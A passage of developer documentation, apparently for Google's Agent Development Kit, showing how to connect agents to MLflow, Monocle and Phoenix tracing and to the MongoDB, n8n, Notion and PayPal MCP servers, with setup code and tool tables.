port (5000 in this example): ```bash mlflow server --backend-store-uri sqlite:///mlflow.db --port 5000 ``` You can point `--backend-store-uri` to other SQL backends (PostgreSQL, MySQL, MSSQL). OTLP ingestion is not supported with file-based backends. ## Configure OpenTelemetry (required) You must configure an OTLP exporter and set a global tracer provider before using any ADK components so that spans are emitted to MLflow. Initialize the OTLP exporter and global tracer provider in code before importing or constructing ADK agents/tools: ```python # my_agent/agent.py from opentelemetry import trace from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter from opentelemetry.sdk.trace import TracerProvider from opentelemetry.sdk.trace.export import SimpleSpanProcessor exporter = OTLPSpanExporter( endpoint="http://localhost:5000/v1/traces", headers={"x-mlflow-experiment-id": "123"} # replace with your experiment id ) provider = TracerProvider() provider.add_span_processor(SimpleSpanProcessor(exporter)) trace.set_tracer_provider(provider) # set BEFORE importing/using ADK ``` This configures the OpenTelemetry pipeline and sends ADK spans to the MLflow server on each run. ## Example: Trace an ADK agent Now you can add the agent code for a simple math agent, after the code that sets up the OTLP exporter and tracer provider: ```python # my_agent/agent.py from google.adk.agents import LlmAgent from google.adk.tools import FunctionTool def calculator(a: float, b: float) -> str: """Add two numbers and return the result.""" return str(a + b) calculator_tool = FunctionTool(func=calculator) root_agent = LlmAgent( name="MathAgent", model="gemini-2.0-flash-exp", instruction=( "You are a helpful assistant that can do math. " "When asked a math problem, use the calculator tool to solve it." ), tools=[calculator_tool], ) ``` Run the agent with: ```bash adk run my_agent ``` And ask it a math problem: ```console What is 12 + 34? ``` You should then see output similar to: ```console [MathAgent]: The answer is 46. ``` ## View traces in MLflow Open the MLflow UI at `http://localhost:5000`, select your experiment, and inspect the trace tree and spans generated by your ADK agent. ## Tips - Set the tracer provider before importing or initializing ADK objects so all spans are captured. - Behind a proxy or on a remote host, replace `localhost:5000` with your server address. ## Resources - [MLflow Tracing Documentation](https://mlflow.org/docs/latest/genai/tracing/): Official documentation for MLflow Tracing that covers other library integrations and downstream usage of traces, such as evaluation, monitoring, searching, and more. - [OpenTelemetry in MLflow](https://mlflow.org/docs/latest/genai/tracing/opentelemetry/): Detailed guide on how to use OpenTelemetry with MLflow. - [MLflow for Agents](https://mlflow.org/docs/latest/genai/): Comprehensive guide on how to use MLflow for building production-ready agents. # MongoDB MCP tool for ADK Supported in ADKPythonTypeScript The [MongoDB MCP Server](https://github.com/mongodb-js/mongodb-mcp-server) connects your ADK agent to [MongoDB](https://www.mongodb.com/) databases and MongoDB Atlas clusters. This integration gives your agent the ability to query collections, manage databases, and interact with MongoDB Atlas infrastructure using natural language. ## Use cases - **Data Exploration and Analysis**: Query MongoDB collections using natural language, run aggregations, and analyze document schemas without writing complex queries manually. - **Database Administration**: List databases and collections, create indexes, manage users, and monitor database statistics through conversational commands. - **Atlas Infrastructure Management**: Create and manage MongoDB Atlas clusters, configure access lists, and view performance recommendations directly from your agent. ## Prerequisites - **For database access**: A MongoDB connection string (local, self-hosted, or Atlas cluster) - **For Atlas management**: A [MongoDB Atlas](https://www.mongodb.com/atlas) service account with API credentials (client ID and secret) ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # For database access, use a connection string: CONNECTION_STRING = "mongodb://localhost:27017/myDatabase" # For Atlas management, use API credentials: # ATLAS_CLIENT_ID = "YOUR_ATLAS_CLIENT_ID" # ATLAS_CLIENT_SECRET = "YOUR_ATLAS_CLIENT_SECRET" root_agent = Agent( model="gemini-2.5-pro", name="mongodb_agent", instruction="Help users query and manage MongoDB databases", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="npx", args=[ "-y", "mongodb-mcp-server", "--readOnly", # Remove for write operations ], env={ # For database access, use: "MDB_MCP_CONNECTION_STRING": CONNECTION_STRING, # For Atlas management, use: # "MDB_MCP_API_CLIENT_ID": ATLAS_CLIENT_ID, # "MDB_MCP_API_CLIENT_SECRET": ATLAS_CLIENT_SECRET, }, ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; // For database access, use a connection string: const CONNECTION_STRING = "mongodb://localhost:27017/myDatabase"; // For Atlas management, use API credentials: // const ATLAS_CLIENT_ID = "YOUR_ATLAS_CLIENT_ID"; // const ATLAS_CLIENT_SECRET = "YOUR_ATLAS_CLIENT_SECRET"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "mongodb_agent", instruction: "Help users query and manage MongoDB databases", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "mongodb-mcp-server", "--readOnly", // Remove for write operations ], env: { // For database access, use: MDB_MCP_CONNECTION_STRING: CONNECTION_STRING, // For Atlas management, use: // MDB_MCP_API_CLIENT_ID: ATLAS_CLIENT_ID, // MDB_MCP_API_CLIENT_SECRET: ATLAS_CLIENT_SECRET, }, }, }), ], }); export { rootAgent }; ``` ## Available tools ### MongoDB database tools | Tool | Description | | -------------------- | ----------------------------------------------- | | `find` | Run a find query against a MongoDB collection | | `aggregate` | Run an aggregation against a MongoDB collection | | `count` | Get the number of documents in a collection | | `list-databases` | List all databases for a MongoDB connection | | `list-collections` | List all collections for a given database | | `collection-schema` | Describe the schema for a collection | | `collection-indexes` | Describe the indexes for a collection | | `insert-many` | Insert documents into a collection | | `update-many` | Update documents matching a filter | | `delete-many` | Remove documents matching a filter | | `create-collection` | Create a new collection | | `drop-collection` | Remove a collection from the database | | `drop-database` | Remove a database | | `create-index` | Create an index for a collection | | `drop-index` | Drop an index from a collection | | `rename-collection` | Rename a collection | | `db-stats` | Get statistics for a database | | `explain` | Get query execution statistics | | `export` | Export query results in EJSON format | ### MongoDB Atlas tools Note Atlas tools require API credentials. Set `MDB_MCP_API_CLIENT_ID` and `MDB_MCP_API_CLIENT_SECRET` environment variables to enable them. | Tool | Description | | ------------------------------- | -------------------------------- | | `atlas-list-orgs` | List MongoDB Atlas organizations | | `atlas-list-projects` | List MongoDB Atlas projects | | `atlas-list-clusters` | List MongoDB Atlas clusters | | `atlas-inspect-cluster` | Inspect metadata of a cluster | | `atlas-list-db-users` | List database users | | `atlas-create-free-cluster` | Create a free Atlas cluster | | `atlas-create-project` | Create an Atlas project | | `atlas-create-db-user` | Create a database user | | `atlas-create-access-list` | Configure IP access list | | `atlas-inspect-access-list` | View IP access list entries | | `atlas-list-alerts` | List Atlas alerts | | `atlas-get-performance-advisor` | Get performance recommendations | ## Configuration ### Environment variables | Variable | Description | | --------------------------- | --------------------------------------------- | | `MDB_MCP_CONNECTION_STRING` | MongoDB connection string for database access | | `MDB_MCP_API_CLIENT_ID` | Atlas API client ID for Atlas tools | | `MDB_MCP_API_CLIENT_SECRET` | Atlas API client secret for Atlas tools | | `MDB_MCP_READ_ONLY` | Enable read-only mode (`true` or `false`) | | `MDB_MCP_DISABLED_TOOLS` | Comma-separated list of tools to disable | | `MDB_MCP_LOG_PATH` | Directory for log files | ### Read-only mode The `--readOnly` flag restricts the server to read, connect, and metadata operations only. This prevents any create, update, or delete operations, making it safe for data exploration without risk of accidental modifications. ### Disabling tools You can disable specific tools or categories using `MDB_MCP_DISABLED_TOOLS`: - Tool names: `find`, `aggregate`, `insert-many`, etc. - Categories: `atlas` (all Atlas tools), `mongodb` (all database tools) - Operation types: `create`, `update`, `delete`, `read`, `metadata` ## Additional resources - [MongoDB MCP Server Repository](https://github.com/mongodb-js/mongodb-mcp-server) - [MongoDB Documentation](https://www.mongodb.com/docs/) - [MongoDB Atlas](https://www.mongodb.com/atlas) # Monocle observability for ADK Supported in ADKPython [Monocle](https://github.com/monocle2ai/monocle) is an open-source observability platform for monitoring, debugging, and improving LLM applications and AI Agents. It provides comprehensive tracing capabilities for your Google ADK applications through automatic instrumentation. Monocle generates OpenTelemetry-compatible traces that can be exported to various destinations including local files or console output. ## Overview Monocle automatically instruments Google ADK applications, allowing you to: - **Trace agent interactions** - Automatically capture every agent run, tool call, and model request with full context and metadata - **Monitor execution flow** - Track agent state, delegation events, and execution flow through detailed traces - **Debug issues** - Analyze detailed traces to quickly identify bottlenecks, failed tool calls, and unexpected agent behavior - **Flexible export options** - Export traces to local files or console for analysis - **OpenTelemetry compatible** - Generate standard OpenTelemetry traces that work with any OTLP-compatible backend Monocle automatically instruments the following Google ADK components: - **`BaseAgent.run_async`** - Captures agent execution, agent state, and delegation events - **`FunctionTool.run_async`** - Captures tool execution, including tool name, parameters, and results - **`Runner.run_async`** - Captures runner execution, including request context and execution flow ## Installation ### 1. Install Required Packages ```bash pip install monocle_apptrace google-adk ``` ## Setup ### 1. Configure Monocle Telemetry Monocle automatically instruments Google ADK when you initialize telemetry. Simply call `setup_monocle_telemetry()` at the start of your application: ```python from monocle_apptrace import setup_monocle_telemetry # Initialize Monocle telemetry - automatically instruments Google ADK setup_monocle_telemetry(workflow_name="my-adk-app") ``` That's it! Monocle will automatically detect and instrument your Google ADK agents, tools, and runners. ### 2. Configure Exporters (Optional) By default, Monocle exports traces to local JSON files. You can configure different exporters using environment variables. #### Export to Console (for debugging) Set the environment variable: ```bash export MONOCLE_EXPORTER="console" ``` #### Export to Local Files (default) ```bash export MONOCLE_EXPORTER="file" ``` Or simply omit the `MONOCLE_EXPORTER` variable - it defaults to `file`. ## Observe Now that you have tracing setup, all Google ADK SDK requests will be automatically traced by Monocle. ```python from monocle_apptrace import setup_monocle_telemetry from google.adk.agents import Agent from google.adk.runners import InMemoryRunner from google.genai import types # Initialize Monocle telemetry - must be called before using ADK setup_monocle_telemetry(workflow_name="weather_app") # Define a tool function def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city for which to retrieve the weather report. Returns: dict: status and result or error msg. """ if city.lower() == "new york": return { "status": "success", "report": ( "The weather in New York is sunny with a temperature of 25 degrees" " Celsius (77 degrees Fahrenheit)." ), } else: return { "status": "error", "error_message": f"Weather information for '{city}' is not available.", } # Create an agent with tools agent = Agent( name="weather_agent", model="gemini-2.0-flash-exp", description="Agent to answer questions using weather tools.", instruction="You must use the available tools to find an answer.", tools=[get_weather] ) app_name = "weather_app" user_id = "test_user" session_id = "test_session" runner = InMemoryRunner(agent=agent, app_name=app_name) session_service = runner.session_service await session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id ) # Run the agent (all interactions will be automatically traced) async for event in runner.run_async( user_id=user_id, session_id=session_id, new_message=types.Content(role="user", parts=[ types.Part(text="What is the weather in New York?")] ) ): if event.is_final_response(): print(event.content.parts[0].text.strip()) ``` ## Accessing Traces By default, Monocle generates traces in JSON files in the local directory `./monocle`. The file name format is: ```text monocle_trace_{workflow_name}_{trace_id}_{timestamp}.json ``` Each trace file contains an array of OpenTelemetry-compatible spans that capture: - **Agent execution spans** - Agent state, delegation events, and execution flow - **Tool execution spans** - Tool name, input parameters, and output results - **LLM interaction spans** - Model calls, prompts, responses, and token usage (if using Gemini or other LLMs) You can analyze these trace files using any OpenTelemetry-compatible tool or write custom analysis scripts. ## Visualizing Traces with VS Code Extension The [Okahu Trace Visualizer](https://marketplace.visualstudio.com/items?itemName=OkahuAI.okahu-ai-observability) VS Code extension provides an interactive way to visualize and analyze Monocle-generated traces directly in Visual Studio Code. ### Installation 1. Open VS Code 1. Press `Ctrl+P` (or `Cmd+P` on Mac) to open Quick Open 1. Paste the following command and press Enter: ```text ext install OkahuAI.okahu-ai-observability ``` Alternatively, you can install it from the [VS Code Marketplace](https://marketplace.visualstudio.com/items?itemName=OkahuAI.okahu-ai-observability). ### Features The extension provides: - **Custom Activity Bar Panel** - Dedicated sidebar for trace file management - **Interactive File Tree** - Browse and select trace files with custom React UI - **Split View Analysis** - Gantt chart visualization alongside JSON data viewer - **Real-time Communication** - Seamless data flow between VS Code and React components - **VS Code Theming** - Fully integrated with VS Code's light/dark themes ### Usage 1. After running your ADK application with Monocle tracing enabled, trace files will be generated in the `./monocle` directory 1. Open the Okahu Trace Visualizer panel from the VS Code Activity Bar 1. Browse and select trace files from the interactive file tree 1. View your traces with: 1. **Gantt chart visualization** - See the timeline and hierarchy of spans 1. **JSON data viewer** - Inspect detailed span attributes and events 1. **Token counts** - View token usage for LLM calls 1. **Error badges** - Quickly identify failed operations ## What Gets Traced Monocle automatically captures the following information from Google ADK: - **Agent Execution**: Agent state, delegation events, and execution flow - **Tool Calls**: Tool name, input parameters, and output results - **Runner Execution**: Request context and overall execution flow - **Timing Information**: Start time, end time, and duration for each operation - **Error Information**: Exceptions and error states All traces are generated in OpenTelemetry format, making them compatible with any OTLP-compatible observability backend. ## Support and Resources - [Monocle Documentation](https://docs.okahu.ai/monocle_overview/) - [Monocle GitHub Repository](https://github.com/monocle2ai/monocle) - [Google ADK Travel Agent Example](https://github.com/okahu-demos/adk-travel-agent) - [Discord Community](https://discord.gg/D8vDbSUhJX) # n8n MCP tool for ADK Supported in ADKPythonTypeScript The [n8n MCP Server](https://docs.n8n.io/advanced-ai/accessing-n8n-mcp-server/) connects your ADK agent to [n8n](https://n8n.io/), an extendable workflow automation tool. This integration allows your agent to securely connect to an n8n instance to search, inspect, and trigger workflows directly from a natural language interface. Alternative: Workflow-level MCP Server The configuration guide on this page covers **Instance-level MCP access**, which connects your agent to a central hub of enabled workflows. Alternatively, you can use the [MCP Server Trigger node](https://docs.n8n.io/integrations/builtin/core-nodes/n8n-nodes-langchain.mcptrigger/) to make a **single workflow** act as its own standalone MCP server. This method is useful if you want to craft specific server behaviors or expose tools isolated to one workflow. ## Use cases - **Execute Complex Workflows**: Trigger multi-step business processes defined in n8n directly from your agent, leveraging reliable branching logic, loops, and error handling to ensure consistency. - **Connect to External Apps**: Access pre-built integrations through n8n without writing custom tools for each service, eliminating the need to manage API authentication, headers, or boilerplate code. - **Data Processing**: Offload complex data transformation tasks to n8n workflows, such as converting natural language into API calls or scraping and summarizing webpages, utilizing custom Python or JavaScript nodes for precise data shaping. ## Prerequisites - An active n8n instance - MCP access enabled in settings - A valid MCP access token Refer to the [n8n MCP documentation](https://docs.n8n.io/advanced-ai/accessing-n8n-mcp-server/) for detailed setup instructions. ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters N8N_INSTANCE_URL = "https://localhost:5678" N8N_MCP_TOKEN = "YOUR_N8N_MCP_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="n8n_agent", instruction="Help users manage and execute workflows in n8n", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="npx", args=[ "-y", "supergateway", "--streamableHttp", f"{N8N_INSTANCE_URL}/mcp-server/http", "--header", f"authorization:Bearer {N8N_MCP_TOKEN}" ] ), timeout=300, ), ) ], ) ``` ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StreamableHTTPServerParams N8N_INSTANCE_URL = "https://localhost:5678" N8N_MCP_TOKEN = "YOUR_N8N_MCP_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="n8n_agent", instruction="Help users manage and execute workflows in n8n", tools=[ McpToolset( connection_params=StreamableHTTPServerParams( url=f"{N8N_INSTANCE_URL}/mcp-server/http", headers={ "Authorization": f"Bearer {N8N_MCP_TOKEN}", }, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const N8N_INSTANCE_URL = "https://localhost:5678"; const N8N_MCP_TOKEN = "YOUR_N8N_MCP_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "n8n_agent", instruction: "Help users manage and execute workflows in n8n", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "supergateway", "--streamableHttp", `${N8N_INSTANCE_URL}/mcp-server/http`, "--header", `authorization:Bearer ${N8N_MCP_TOKEN}`, ], }, }), ], }); export { rootAgent }; ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const N8N_INSTANCE_URL = "https://localhost:5678"; const N8N_MCP_TOKEN = "YOUR_N8N_MCP_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "n8n_agent", instruction: "Help users manage and execute workflows in n8n", tools: [ new MCPToolset({ type: "StreamableHTTPConnectionParams", url: `${N8N_INSTANCE_URL}/mcp-server/http`, header: { Authorization: `Bearer ${N8N_MCP_TOKEN}`, }, }), ], }); export { rootAgent }; ``` ## Available tools | Tool | Description | | ---------------------- | ------------------------------------------------------- | | `search_workflows` | Search for available workflows | | `execute_workflow` | Execute a specific workflow | | `get_workflow_details` | Retrieve metadata and schema information for a workflow | ## Configuration To make workflows accessible to your agent, they must meet the following criteria: - **Be Active**: The workflow must be activated in n8n. - **Supported Trigger**: Contain a Webhook, Schedule, Chat, or Form trigger node. - **Enabled for MCP**: You must toggle "Available in MCP" in the workflow settings or select "Enable MCP access" from the workflow card menu. ## Additional resources - [n8n MCP Server Documentation](https://docs.n8n.io/advanced-ai/accessing-n8n-mcp-server/) # Notion MCP tool for ADK Supported in ADKPythonTypeScript The [Notion MCP Server](https://github.com/makenotion/notion-mcp-server) connects your ADK agent to Notion, allowing it to search, create, and manage pages, databases, and more within a workspace. This gives your agent the ability to query, create, and organize content in your Notion workspace using natural language. ## Use cases - **Search your workspace**: Find project pages, meeting notes, or documents based on content. - **Create new content**: Generate new pages for meeting notes, project plans, or tasks. - **Manage tasks and databases**: Update the status of a task, add items to a database, or change properties. - **Organize your workspace**: Move pages, duplicate templates, or add comments to documents. ## Prerequisites - Obtain a Notion integration token by going to [Notion Integrations](https://www.notion.so/profile/integrations) in your profile. Refer to the [authorization documentation](https://developers.notion.com/docs/authorization) for more details. - Ensure relevant pages and databases can be accessed by your integration. Visit the Access tab in your [Notion Integration](https://www.notion.so/profile/integrations) settings, then grant access by selecting the pages you'd like to use. ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters NOTION_TOKEN = "YOUR_NOTION_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="notion_agent", instruction="Help users get information from Notion", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params = StdioServerParameters( command="npx", args=[ "-y", "@notionhq/notion-mcp-server", ], env={ "NOTION_TOKEN": NOTION_TOKEN, } ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const NOTION_TOKEN = "YOUR_NOTION_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "notion_agent", instruction: "Help users get information from Notion", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: ["-y", "@notionhq/notion-mcp-server"], env: { NOTION_TOKEN: NOTION_TOKEN, }, }, }), ], }); export { rootAgent }; ``` ## Available tools | Tool | Description | | ------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `notion-search` | Search across your Notion workspace and connected tools like Slack, Google Drive, and Jira. Falls back to basic workspace search if AI features aren’t available. | | `notion-fetch` | Retrieves content from a Notion page or database by its URL | | `notion-create-pages` | Creates one or more Notion pages with specified properties and content. | | `notion-update-page` | Update a Notion page's properties or content. | | `notion-move-pages` | Move one or more Notion pages or databases to a new parent. | | `notion-duplicate-page` | Duplicate a Notion page within your workspace. This action is completed async. | | `notion-create-database` | Creates a new Notion database, initial data source, and initial view with the specified properties. | | `notion-update-database` | Update a Notion data source's properties, name, description, or other attributes. | | `notion-create-comment` | Add a comment to a page | | `notion-get-comments` | Lists all comments on a specific page, including threaded discussions. | | `notion-get-teams` | Retrieves a list of teams (teamspaces) in the current workspace. | | `notion-get-users` | Lists all users in the workspace with their details. | | `notion-get-user` | Retrieve your user information by ID | | `notion-get-self` | Retrieves information about your own bot user and the Notion workspace you’re connected to. | ## Additional resources - [Notion MCP Server Documentation](https://developers.notion.com/docs/mcp) - [Notion MCP Server Repository](https://github.com/makenotion/notion-mcp-server) # PayPal MCP tool for ADK Supported in ADKPythonTypeScript The [PayPal MCP Server](https://github.com/paypal/paypal-mcp-server) connects your ADK agent to the [PayPal](https://www.paypal.com/) ecosystem. This integration gives your agent the ability to manage payments, invoices, subscriptions, and disputes using natural language, enabling automated commerce workflows and business insights. ## Use cases - **Streamline Financial Operations**: Create orders, send invoices, and process refunds directly through chat without switching context. You can instruct your agent to "bill Client X" or "refund order Y" immediately. - **Manage Subscriptions & Products**: Handle the full lifecycle of recurring billing by creating products, setting up subscription plans, and managing subscriber details using natural language. - **Resolve Issues & Track Performance**: Summarize and accept dispute claims, track shipment statuses, and retrieve merchant insights to make data-driven decisions on the fly. ## Prerequisites - Create a [PayPal Developer account](https://developer.paypal.com/) - Create an app and retrieve your credentials from the [PayPal Developer Dashboard](https://developer.paypal.com/) - [Generate an access token](https://developer.paypal.com/reference/get-an-access-token/) from your credentials ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters PAYPAL_ENVIRONMENT = "SANDBOX" # Options: "SANDBOX" or "PRODUCTION" PAYPAL_ACCESS_TOKEN = "YOUR_PAYPAL_ACCESS_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="paypal_agent", instruction="Help users manage their PayPal account", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="npx", args=[ "-y", "@paypal/mcp", "--tools=all", # (Optional) Specify which tools to enable # "--tools=subscriptionPlans.list,subscriptionPlans.show", ], env={ "PAYPAL_ACCESS_TOKEN": PAYPAL_ACCESS_TOKEN, "PAYPAL_ENVIRONMENT": PAYPAL_ENVIRONMENT, } ), timeout=300, ), ) ], ) ``` ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import SseConnectionParams PAYPAL_MCP_ENDPOINT = "https://mcp.sandbox.paypal.com/sse" # Production: https://mcp.paypal.com/sse PAYPAL_ACCESS_TOKEN = "YOUR_PAYPAL_ACCESS_TOKEN" root_agent = Agent( model="gemini-2.5-pro", name="paypal_agent", instruction="Help users manage their PayPal account", tools=[ McpToolset( connection_params=SseConnectionParams( url=PAYPAL_MCP_ENDPOINT, headers={ "Authorization": f"Bearer {PAYPAL_ACCESS_TOKEN}", }, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const PAYPAL_ENVIRONMENT = "SANDBOX"; // Options: "SANDBOX" or "PRODUCTION" const PAYPAL_ACCESS_TOKEN = "YOUR_PAYPAL_ACCESS_TOKEN"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "paypal_agent", instruction: "Help users manage their PayPal account", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "@paypal/mcp", "--tools=all", // (Optional) Specify which tools to enable // "--tools=subscriptionPlans.list,subscriptionPlans.show", ], env: { PAYPAL_ACCESS_TOKEN: PAYPAL_ACCESS_TOKEN, PAYPAL_ENVIRONMENT: PAYPAL_ENVIRONMENT, }, }, }), ], }); export { rootAgent }; ``` Note **Token Expiration**: PayPal Access Tokens have a limited lifespan of 3-8 hours. If your agent stops working, ensure your token has not expired and generate a new one if necessary. You should implement token refresh logic to handle token expiration. ## Available tools ### Catalog management | Tool | Description | | ---------------------- | ---------------------------------------------------------- | | `create_product` | Create a new product in the PayPal catalog | | `list_products` | List products from the PayPal catalog | | `show_product_details` | Show details of a specific product from the PayPal catalog | | `update_product` | Update an existing product in the PayPal catalog | ### Dispute management | Tool | Description | | ---------------------- | ---------------------------------------------------------- | | `list_disputes` | Retrieve a summary of all disputes with optional filtering | | `get_dispute` | Retrieve detailed information about a specific dispute | | `accept_dispute_claim` | Accept a dispute claim, resolving it in favor of the buyer | ### Invoices | Tool | Description | | -------------------------- | --------------------------------------------------- | | `create_invoice` | Create a new invoice in the PayPal system | | `list_invoices` | List invoices | | `get_invoice` | Retrieve details about a specific invoice | | `send_invoice` | Send an existing invoice to the specified recipient | | `send_invoice_reminder` | Send a reminder for an existing invoice | | `cancel_sent_invoice` | Cancel a sent invoice | | `generate_invoice_qr_code` | Generate a QR code for an invoice | ### Payments | Tool | Description | | --------------- | ------------------------------------------------------------------ | | `create_order` | Create an order in the PayPal system based on the provided details | | `create_refund` | Process a refund for a captured payment | | `get_order` | Get details of a specific payment | | `get_refund` | Get the details for a specific refund | | `pay_order` | Capture payment for an authorized order | ### Reporting and insights | Tool | Description | | ----------------------- | ------------------------------------------------------------------- | | `get_merchant_insights` | Retrieve business intelligence metrics and analytics for a merchant | | `list_transactions` | List all transactions | ### Shipment tracking | Tool | Description | | -------------------------- | ------------------------------------------------------------- | | `create_shipment_tracking` | Create shipment tracking information for a PayPal transaction | | `get_shipment_tracking` | Get shipment tracking information for a specific shipment | | `update_shipment_tracking` | Update shipment tracking information for a specific shipment | ### Subscription management | Tool | Description | | -------------------------------- | -------------------------------------------- | | `cancel_subscription` | Cancel an active subscription | | `create_subscription` | Create a new subscription | | `create_subscription_plan` | Create a new subscription plan | | `update_subscription` | Update an existing subscription | | `list_subscription_plans` | List subscription plans | | `show_subscription_details` | Show details of a specific subscription | | `show_subscription_plan_details` | Show details of a specific subscription plan | ## Configuration You can control which tools are enabled using the `--tools` command-line argument. This is useful for limiting the scope of the agent's permissions. You can enable all tools with `--tools=all` or specify a comma-separated list of specific tool identifiers. **Note**: The configuration identifiers below use dot notation (e.g., `invoices.create`) which differs from the tool names exposed to the agent (e.g., `create_invoice`). **Products**: `products.create`, `products.list`, `products.update`, `products.show` **Disputes**: `disputes.list`, `disputes.get`, `disputes.create` **Invoices**: `invoices.create`, `invoices.list`, `invoices.get`, `invoices.send`, `invoices.sendReminder`, `invoices.cancel`, `invoices.generateQRC` **Orders & Payments**: `orders.create`, `orders.get`, `orders.capture`, `payments.createRefund`, `payments.getRefunds` **Transactions**: `transactions.list` **Shipment**: `shipment.create`, `shipment.get` **Subscriptions**: `subscriptionPlans.create`, `subscriptionPlans.list`, `subscriptionPlans.show`, `subscriptions.create`, `subscriptions.show`, `subscriptions.cancel` ## Additional resources - [PayPal MCP Server Documentation](https://docs.paypal.ai/developer/tools/ai/mcp-quickstart) - [PayPal MCP Server Repository](https://github.com/paypal/paypal-mcp-server) - [PayPal Agent Tools Reference](https://docs.paypal.ai/developer/tools/ai/agent-tools-ref) # Phoenix observability for ADK Supported in ADKPython [Phoenix](https://arize.com/docs/phoenix) is an open-source, self-hosted observability platform for monitoring, debugging, and improving LLM applications and AI Agents at scale. It provides comprehensive tracing and evaluation capabilities for your Google ADK applications. To get started, sign up for a [free account](https://phoenix.arize.com/). ## Overview Phoenix can automatically collect traces from Google ADK using [OpenInference instrumentation](https://github.com/Arize-ai/openinference/tree/main/python/instrumentation/openinference-instrumentation-google-adk), allowing you to: - **Trace agent interactions** - Automatically capture every agent run, tool call, model request, and response with full context and metadata - **Evaluate performance** - Assess agent behavior using custom or pre-built evaluators and run experiments to test agent configurations - **Debug issues** - Analyze detailed traces to quickly identify bottlenecks, failed tool calls, and unexpected agent behavior - **Self-hosted control** - Keep your data on your own infrastructure ## Installation ### 1. Install Required Packages ```bash pip install openinference-instrumentation-google-adk google-adk arize-phoenix-otel ``` ## Setup ### 1. Launch Phoenix These instructions show you how to use Phoenix Cloud. You can also [launch Phoenix](https://arize.com/docs/phoenix/integrations/llm-providers/google-gen-ai/google-adk-tracing) in a notebook, from your terminal, or self-host it using a container. 1. Sign up for a [free Phoenix account](https://phoenix.arize.com/). 1. From the Settings page of your new Phoenix Space, create your API key 1. Copy your endpoint which should look like: https://app.phoenix.arize.com/s/[your-space-name] **Set your Phoenix endpoint and API Key:** ```python import os os.environ["PHOENIX_API_KEY"] = "ADD YOUR PHOENIX API KEY" os.environ["PHOENIX_COLLECTOR_ENDPOINT"] = "ADD YOUR PHOENIX COLLECTOR ENDPOINT" # If you created your Phoenix Cloud instance before June 24th, 2025, set the API key as a header: # os.environ["PHOENIX_CLIENT_HEADERS"] = f"api_key={os.getenv('PHOENIX_API_KEY')}" ``` ### 2. Connect your application to Phoenix ```python from phoenix.otel import register # Configure the Phoenix tracer tracer_provider = register( project_name="my-llm-app", # Default is 'default' auto_instrument=True # Auto-instrument your app based on installed OI dependencies ) ``` ## Observe Now that you have tracing setup, all Google ADK SDK requests will be streamed to Phoenix for observability and evaluation. ```python import nest_asyncio nest_asyncio.apply() from google.adk.agents import Agent from google.adk.runners import InMemoryRunner from google.genai import types # Define a tool function def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city for which to retrieve the weather report. Returns: dict: status and result or error msg. """ if city.lower() == "new york": return { "status": "success", "report": ( "The weather in New York is sunny with a temperature of 25 degrees" " Celsius (77 degrees Fahrenheit)." ), } else: return { "status": "error", "error_message": f"Weather information for '{city}' is not available.", } # Create an agent with tools agent = Agent( name="weather_agent", model="gemini-2.0-flash-exp", description="Agent to answer questions using weather tools.", instruction="You must use the available tools to find an answer.", tools=[get_weather] ) app_name = "weather_app" user_id = "test_user" session_id = "test_session" runner = InMemoryRunner(agent=agent, app_name=app_name) session_service = runner.session_service await session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id ) # Run the agent (all interactions will be traced) async for event in runner.run_async( user_id=user_id, session_id=session_id, new_message=types.Content(role="user", parts=[ types.Part(text="What is the weather in New York?")] ) ): if event.is_final_response(): print(event.content.parts[0].text.strip()) ``` ## Support and Resources - [Phoenix Documentation](https://arize.com/docs/phoenix/integrations/llm-providers/google-gen-ai/google-adk-tracing) - [Community 